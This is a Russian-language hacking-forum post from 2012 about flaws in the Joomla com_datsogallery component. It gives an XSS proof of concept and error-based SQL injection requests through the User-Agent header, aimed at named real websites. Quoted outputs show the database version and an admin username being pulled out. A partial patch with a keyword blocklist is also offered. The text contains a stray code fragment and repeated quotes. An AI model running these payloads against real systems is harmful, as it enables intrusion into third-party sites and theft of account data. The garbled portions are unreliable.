Тема: Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов
Показать сообщение отдельно

  #253  
Старый 02.04.2012, 10:05
eclipse
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
Провел на форуме:
30555

Репутация: 85
По умолчанию
Цитата:
Сообщение от None  
Исправление
Joomla "com_datsogallery" sqli
Цитата:
Сообщение от Osstudio  
http://joomlaforum.ru/index.php?topic=33952.0;wap2
Плохое исправление, в если пофиксить сайт таким образом, sql inj не будет, но останется возможность sixss и вывод ошибки также не исчезнет

SIXSS PoC

Цитата:
Сообщение от None  
http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent:
alert(/xss/)
Для корректного исправления нужно добавить в предлагаемый код что-то вроде strip_tags, и error_reporting чтобы ошибки не выдавать:

Код:
error_reporting(0);
 $browser        = strip_tags($_SERVER['HTTP_USER_AGENT']);
    $browser_tmp = ' '.strtoupper($browser);
    if ((strpos($browser_tmp, 'SELECT')) or
      (strpos($browser_tmp, 'DELETE')) or
      (strpos($browser_tmp, 'UPDATE')) or
      (strpos($browser_tmp, 'INSERT')) or
      (strpos($browser_tmp, ' FROM ')) or
      (strpos($browser_tmp, ' INTO ')) or
      (strpos($browser_tmp, 'VALUES'))
    ) {
      die('SQL-injection rejected.');
    }
Цитата:
Сообщение от Expl0ited  
Я думаю лучше юзать скуль в данном случае.
Цитата:
Сообщение от None  
GET http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
Duplicate entry '5.0.26-log' for key 1
" if author else f"
Цитата:
Expl0ited said:
Я думаю лучше юзать скуль в данном случае.
Цитата:
Сообщение от None  
GET http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
Duplicate entry '5.0.26-log' for key 1
Или

Цитата:
Сообщение от None  
GET http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla') on duplicate key update a=(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2)) x from jos_users group by x)a)-- -
Duplicate entry 'admin
1
' for key 1
На некоторых сайтах один из вариантов не работает
 
Ответить с цитированием